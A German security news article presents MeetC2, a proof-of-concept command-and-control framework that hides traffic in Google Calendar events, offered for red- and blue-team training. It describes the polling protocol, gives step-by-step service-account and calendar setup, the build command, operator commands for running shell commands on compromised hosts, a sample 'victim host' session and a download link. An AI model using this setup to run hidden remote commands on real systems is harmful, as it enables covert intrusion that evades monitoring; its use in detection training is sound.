
Angreifer setzen zunehmend auf Cloud-Dienste, um Command-and-Control-Datenverkehr (C2) unauffällig zu tarnen. Mit dem Proof of Concept MeetC2 – auch bekannt als Meeting C2 – wird diese Technik demonstriert.
Das plattformübergreifende, serverlose Framework nutzt die Google-Kalender-API als verdeckten Kommunikationskanal zwischen Angreifern und kompromittierten Systemen. Entwickelt wurde MeetC2, um unter kontrollierten Bedingungen Red- und Blue-Teams die Möglichkeit zu geben, Erkennung, Telemetrie und Reaktion auf Cloud-Missbrauch zu trainieren.
Während einer Purple-Team-Übung zeigte sich, wie leicht sich Datenverkehr über vertrauenswürdige SaaS-Domänen einschleusen lässt. Über den Endpunkt „Ereignisse“ im Google Kalender fragt der Gastagent alle 30 Sekunden nach neuen, unsichtbaren Einträgen und empfängt so Befehle der Angreifer.
MeetC2 missbraucht Google-Kalender-API für verdeckte Kommunikation
MeetC2, auch bekannt als MeetingC2, ist eine plattformübergreifende Anwendung (macOS/Linux), die zeigt, wie legitime Cloud-Dienste für feindliche Operationen missbraucht werden können. Mithilfe der Google Kalender-APIs erstellt das Framework einen versteckten Kommunikationskanal, der sich in den normalen Geschäftsverkehr einfügt.
Die hier verwendeten Domains sind „oauth2.googleapis.com” und „www.googleapis.com”. Nach der Authentifizierung tritt der Agent in eine Abfrageschleife ein und sendet alle 30 Sekunden GET-Anfragen an „www.googleapis.com/calendar/v3/calendars/{calendarId}/events”, um nach neuen Kalenderereignissen zu suchen, die Befehle enthalten.
Wenn der Organisator einen neuen Befehl ausgeben möchte, kann er über den „organiser”-Agenten ein neues Ereignis an denselben Kalender-API-Endpunkt POST senden, wobei der Befehl in das Zusammenfassungsfeld des Ereignisses eingebettet ist, z. B. „Meeting von niemandem: [BEFEHL]”.
Der „guest”-Agent identifiziert diese Befehlsereignisse während seiner regelmäßigen Abfrage, extrahiert und führt den Befehl lokal aus und aktualisiert dann dasselbe Ereignis über eine PUT-Anfrage, um die Befehlsausgabe in den Parameter [OUTPUT] [/OUTPUT] im Beschreibungsfeld aufzunehmen.
Einrichtung von Google Kalender
- Navigieren Sie zur URL Google Cloud Console und melden Sie sich mit Ihrem Google-Konto an. Wählen Sie ein Projekt aus oder erstellen Sie ein neues Projekt.
- Navigieren Sie zu „APIs & Services“ → Klicken Sie auf „Library“, suchen Sie im Suchfeld nach Google Calendar API und klicken Sie auf „ENABLED“. Es dauert 20 bis 30 Sekunden, bis die API in Ihrem Projekt aktiviert ist.
- Navigieren Sie anschließend zu „APIs & Services“ → „Anmeldedaten“ und klicken Sie oben auf „+ ANMELDEDATEN ERSTELLEN“. Wählen Sie „Dienstkonto“, geben Sie die erforderlichen Details ein, d. h. Dienstkontoname: calendar-invite, Beschreibung: Synchronisiert Kalenderereignisse, und fahren Sie fort. Überspringen Sie die optionalen Rollen/Benutzer und klicken Sie auf „FERTIG“.
- Überprüfen Sie nun Ihre Dienstkontenlisten. Sie sollten eine E-Mail mit dem Betreff „calendar-invite@your-project.iam.gserviceaccount.com“ erhalten haben. Gehen Sie zum Abschnitt „SCHLÜSSEL“ → „SCHLÜSSEL HINZUFÜGEN“ → „Neuen Schlüssel erstellen“, wählen Sie das Format „JSON“ und laden Sie den „SCHLÜSSEL“ herunter. Benennen Sie die heruntergeladene JSON-Datei in credentials.json um, damit Sie sie später verwenden können.
- Navigieren Sie zur URL „https://calendar.google.com“, suchen Sie auf der linken Seite „Other calendars“ (Andere Kalender) → Klicken Sie auf das „+“ und dann auf „Create new calendar“ (Neuen Kalender erstellen) und geben Sie den Namen/die Beschreibung ein. Klicken Sie anschließend auf die drei Punkte daneben → „Settings and sharing“ (Einstellungen und Freigabe). Scrollen Sie nach unten zu „Kalender integrieren“ und suchen Sie nach der „Kalender-ID“, die wie folgt aussehen sollte: „abc123xyz@group.calendar.google.com“.
- Letzte Schritte: Suchen Sie unter „Kalendereinstellungen“ die Option „Für bestimmte Personen freigeben“, klicken Sie auf „+ Personen hinzufügen“ und fügen Sie die E-Mail-Adresse des Dienstkontos aus Schritt 4 oben hinzu (die mit der Endung @your-project.iam.gserviceaccount.com). Ändern Sie die Berechtigung in „Änderungen an Ereignissen vornehmen“ und klicken Sie auf „Senden“. Damit sind Sie fertig.
Befehlszeile
Kompilieren:
./build-all.sh <credentials.json> <calendar_id>
Attacker host:
bash-3.2$ ./organizer credentials.json [NAME]@group.calendar.google.com
MeetC2 Organizer
Commands:
exec <cmd> — Execute on all hosts
exec @host:<cmd> — Execute on specific host
exec @*:<cmd> — Execute on all hosts (explicit)
list — List recent commands
get <event_id> — Get command output
clear — Clear executed events
exit — Exit organizer
— — — — — — — — — — — — — — — — — — — —
> exec whoami
Command created for all hosts: qfj4tt8a4uoi8p7cd3b8t31337
>
>
Victim host:
bash-3.2$ ./guest-darwin-arm64
16:08:04 MeetC2 Guest started on dhirajmishra
16:08:04 Calendar ID: [NAME]@group.calendar.google.com
16:08:04 Polling every 10 seconds…
16:08:15 Executing command: whoami
16:08:16 Successfully updated event with output
„OpSec: Obwohl dies funktionsfähig ist, weiß ich, dass es Verbesserungen bei OpSec speziell für die Binärdatei „guest“ gibt. Verwenden Sie daher für eine solche Einrichtung bitte ein Test-GCP-Projekt, das später gelöscht werden sollte.“ – Dhiraj
Download MeetC2
https://github.com/deriv-security/MeetC2
Entdecken Sie mehr
Fachartikel

CrackArmor: AppArmor-Schwachstellen ermöglichen Root-Zugriff auf über 12 Millionen Linux-Systemen

KI-Agenten als interne Sicherheitsrisiken: Was Experimente zeigen

MCP-Sicherheitsstudie: 555 Server mit riskanten Tool-Kombinationen identifiziert

SOX-Compliance in SAP: Anforderungen, IT-Kontrollen und der Weg zur Automatisierung

Irans Cyberoperationen vor „Epic Fury“: Gezielter Infrastrukturaufbau und Hacktivisten-Welle nach den Angriffen
Studien

Drucksicherheit bleibt in vielen KMU ein vernachlässigter Bereich

Sieben Regierungen einigen sich auf 6G-Sicherheitsrahmen

Lieferkettenkollaps und Internetausfall: Unternehmen rechnen mit dem Unwahrscheinlichen

KI als Werkzeug für schnelle, kostengünstige Cyberangriffe

KI beschleunigt Cyberangriffe: IBM X-Force warnt vor wachsenden Schwachstellen in Unternehmen
Whitepaper

Quantifizierung und Sicherheit mit modernster Quantentechnologie

KI-Betrug: Interpol warnt vor industrialisierter Finanzkriminalität – 4,5-fach profitabler

Cloudflare Threat Report 2026: Ransomware beginnt mit dem Login – KI und Botnetze treiben die Industrialisierung von Cyberangriffen

EBA-Folgebericht: Fortschritte bei IKT-Risikoaufsicht unter DORA – weitere Harmonisierung nötig

Böswillige KI-Nutzung erkennen und verhindern: Anthropics neuer Bedrohungsbericht mit Fallstudien
Hamsterrad-Rebell

Sichere Enterprise Browser und Application Delivery für moderne IT-Organisationen

Sicherer Remote-Zugriff (SRA) für Operational Technology (OT) und industrielle Steuerungs- und Produktionssysteme (ICS) – Teil 2

Incident Response Retainer – worauf sollte man achten?

KI‑basierte E‑Mail‑Angriffe: Einfach gestartet, kaum zu stoppen










